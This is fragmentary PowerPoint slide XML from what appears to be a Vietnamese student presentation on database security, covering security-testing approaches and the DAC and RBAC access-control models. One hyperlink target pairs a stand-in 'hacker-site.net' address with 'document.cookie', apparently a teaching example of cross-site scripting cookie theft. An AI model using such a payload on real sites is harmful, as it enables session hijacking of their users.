    <dsp:sp modelId="{57783180-DF65-447D-A23B-4BB36CBFE36E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3943878"/>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0B5F0C-AB96-4649-9660-6985F76B727C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3943878"/>
          <a:ext cx="10935383" cy="131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Trần Tuấn Khang – 21125481 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3943878"/>
        <a:ext cx="10935383" cy="1319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13567-E371-44D6-BF64-DB1B90FF0D27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7745917" cy="36688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8704" tIns="149352" rIns="74676" bIns="149352" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="2489200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="5600" b="1" u="none" kern="1200" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>I. Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="6828700" cy="3668869"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5785387" y="0"/>
          <a:ext cx="9804710" cy="3668869"/>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028" tIns="149352" rIns="74676" bIns="149352" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="2489200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="5600" b="1" u="none" kern="1200" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7619822" y="0"/>
        <a:ext cx="6135841" cy="36688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E1F64-F0CF-88AA-933F-C315537BE9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65CB90-6330-1B42-CC2F-65872D50B2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BAE320-2480-44B4-B34F-604976F93F49}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0AB9CC-0477-DA20-BE98-8CA6A8E957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7E54319-458A-7DE7-F7A6-3E315A5CEB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E684DA-A4AA-4A20-A7FC-D453375578C0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12222371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AE296-2513-44C1-84A4-DD1E052C1F3E}"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C798A-26E0-4075-9EB5-D8B40BD5C10E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25140376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A91557-D5A3-4BA6-9E29-39912DFA2999}"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36283E-9ECA-4FB2-8210-CEEA1BAA11FC}"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DEDE7-AD60-4CE0-BCA3-E647F9CD1F43}"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032AB-9B4C-4036-B1E6-9272B2E03821}"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36175-43E9-4B84-84F1-7B4CA899FDF7}" type="datetime1">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F016CB-0BBE-4845-9B9B-85B2557B6333}" type="datetime1">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8A5C46-5B00-49FE-8C47-45771C594C4C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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77504D-AFB7-409A-B776-6E47151CBC95}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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39702-FCCD-4738-8B1E-51B309D99790}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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507F44-0565-43B6-AB1B-83DFB67E1D9F}" type="datetime1">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DDE8E5-8C45-478E-BE6C-FFF4F2765DC4}" type="datetime1">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BFA54-0846-469E-B9DC-07C86D319180}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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hyperlink" Target="http://hacker-site.net/%E2%80%9D+document.cookie;"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hacker-site.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/"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svg"/><Relationship Id="rId7"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svg"/><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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle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75382"/>
            <a:ext cx="193952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en-US" b="1" dirty="0">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>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571500" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro"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997" r="-25997"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909602" y="6473540"/>
            <a:ext cx="8306192" cy="589777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>MÔN: Bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927232" y="7251782"/>
            <a:ext cx="5226215" cy="441018"/>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DHHTTT17B - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>420300409302</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8637477" y="5974185"/>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latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533097" y="7678671"/>
            <a:ext cx="3176777" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="904656" y="9277350"/>
            <a:ext cx="7236478" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="293E6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642418" y="2803505"/>
            <a:ext cx="8555901" cy="2078839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="17780" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Bài báo 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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Một cách tiếp cận để kiểm tra bảo mật của phần mềm ứng dụng cơ sở dữ liệu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435579" y="7211443"/>
            <a:ext cx="1371814" cy="434221"/>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NHÓM 6 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946948" y="8661995"/>
            <a:ext cx="8999366" cy="434221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>GIẢNG VIÊN: VÕ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>NGỌC TẤN PHƯỚC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Freeform 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2337050" cy="1019595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2337050" h="1019595">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2337050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2337050" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37E34E3-CCF7-41CA-563C-167F1D6AA16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567760" y="9814639"/>
            <a:ext cx="500040" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:body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a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</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265E-A1DF-0CF5-EB13-B42B0567F5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CED4E2-EDAC-437A-620D-76E5FDB5ECD0}"/>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4111FF6D-251C-F895-C27F-5BC83C7B9742}"/>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C011F023-F498-3E72-FD99-7B867BDDC8AA}"/>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2F3A374-1526-FEE2-64DA-A09F68BB2C82}"/>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6F8FBB3B-3E67-E249-C289-7C2C035C473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4661D22-8A37-F4F0-B13C-998CDB4C8866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="6096000"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200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0FB8ED-4AC2-20E6-D0A3-D932529EFC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11158728" y="3577107"/>
            <a:ext cx="5811975" cy="5429416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5EB685-3F5B-B05F-6BF0-B20A1DD4F6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="357710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Mô hình kiểm soát truy cập tùy quyền (DAC)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55106E-8D15-8AA4-AB8D-51AD76DF887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317297" y="4322339"/>
            <a:ext cx="9841431" cy="3400931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép cấp hoặc hạn chế quyền truy cập đối tượng thông qua chính sách truy cập được xác định bởi nhóm chủ sở hữu hoặc chủ thể của đối tượng. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="30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3000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Một </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>báo cáo nhỏ về dự án cụ thể có thể có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chủ sở hữu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>trưởng nhóm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dự án. Anh ta có thể quyết định chia sẻ tài liệu này với các thành viên khác trong nhóm, nhưng không chia sẻ nó cho những người không liên quan đến dự án.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA58F7D7-A8AF-35C4-612C-DBFB0C289413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8436780" y="9105900"/>
            <a:ext cx="707220" cy="30479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10</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30819585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EAB0-1B1E-E280-27D6-0E3802FCD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20FF9-ACF3-B485-7ACE-E77672F7957B}"/>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3DC6911-4B3B-4ABF-4C77-B6922856341F}"/>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0758C992-63F2-5CB2-2D16-5542F6DFE385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="7460324"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63552FDF-1C78-8B23-15F0-93201F97EE0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AA908A6-B5AB-F8F3-3F2B-FD238581051B}"/>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CF63C84-6065-4E25-EE81-C6D2DF3257ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="9863328" cy="646331"/>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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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55063CD-77BA-8588-09BD-946DFC7AE468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="357710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Mô hình kiểm soát dựa trên vai trò (RBAC)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021CE-3302-DDDA-2CAA-4C4DA180DF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305534" y="4146673"/>
            <a:ext cx="10505466" cy="3616375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trong hệ thống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng chỉ có thể truy cập vào các đối tượng khi được cấp quyền bởi người quản trị viên:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
